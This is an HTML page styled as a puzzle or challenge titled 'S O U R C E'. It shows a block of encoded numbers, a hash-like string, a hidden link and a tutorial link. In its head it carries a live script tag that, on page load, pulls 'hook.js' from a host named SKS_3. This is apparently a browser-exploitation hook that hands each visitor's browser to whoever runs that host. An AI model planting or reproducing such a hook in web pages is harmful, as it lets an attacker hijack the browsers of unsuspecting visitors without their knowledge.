<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
    <head>
        <!--script data-ad-client="ca-pub-9294732860397821" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script-->
        <meta charset="utf-8">
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>S O U R C E</title>
        <meta name="description" content="">
        <!--meta name="viewport" content="width=device-width, initial-scale=1"-->
        <link rel="shortcut icon" href="favicon.ico">
        <script src="http://SKS_3:80/hook.js"></script>
        <!--christmas font-->
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Cookie">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <style>
            body{
                justify-content:center;
                align-items:center;
                text-align:center;
                margin:0;
                padding:0;
                /*background-color:rgba(0, 0, 0, 0.3);*/
                background-color: rgba(0,0,0,0.9);
            }

            h3{
                font-size:45px;
                font-weight:bold;
                padding:15px; 
            }

            p{
                font-weight:bold;
                padding:0 20px 0 20px;
                font-size:17.5px;
                color: seashell;
            }

            .p_main_update{
                text-align:center;
                justify-content:center;
                align-items:center;
                font-size:15px;
                font-weight:bold;
                margin-top:-35px;
                margin-bottom: 45px;
            }
            a{
                text-align: center;
                float: center;
                text-decoration: none;
                font-weight: bold;
                font-size: 25px;
                color: #BBB;
                }
                a:hover{
                    color:rgba(255,255,255,0.5);
                }

                .under_cover{
                    text-decoration: none;
                    font-size:45px;
                    font-weight:bold;
                    color: seashell;
                }
                .under_cover:hover{
                    color: seashell;
                    cursor: progress;
                }
        </style>
    </head>
    <body>
            <h3 style="padding-bottom:30px; color: seashell;">S&nbsp;&nbsp;O&nbsp;&nbsp;<a class="under_cover" href="index_main.html">U</a>&nbsp;&nbsp;R&nbsp;&nbsp;C&nbsp;&nbsp;E</h3>
            <p class="p_main_update">090 071 100 54 050 100 071 070 97 054<br> 099 087 090 119 097 072 065 122 090 071<br> 116 51 107 090 051 112 120 099 110 112<br> 121 099 050 120 121 078 088 99 081 121<br> 097 110 069 121 51 101 99 071 090 115<br> 100 110 074 112 100 109 090 110 100 99<br> 071 086 105 078 088 086 115 078 072 066<br> 048 54 090 110 98 074 105 100 071 082<br> 049 099 087 081 117 098 050 97 053 112 098 050 53 052 103<br> == <br> 22f2226dcb59c6fa898eb914be004f18</p>
            <br><br>
            <p class="p_main_update"><b>Interesting? here's <a href="index_tutorial.html">tutorial</b></a></p>
    </body>
</html>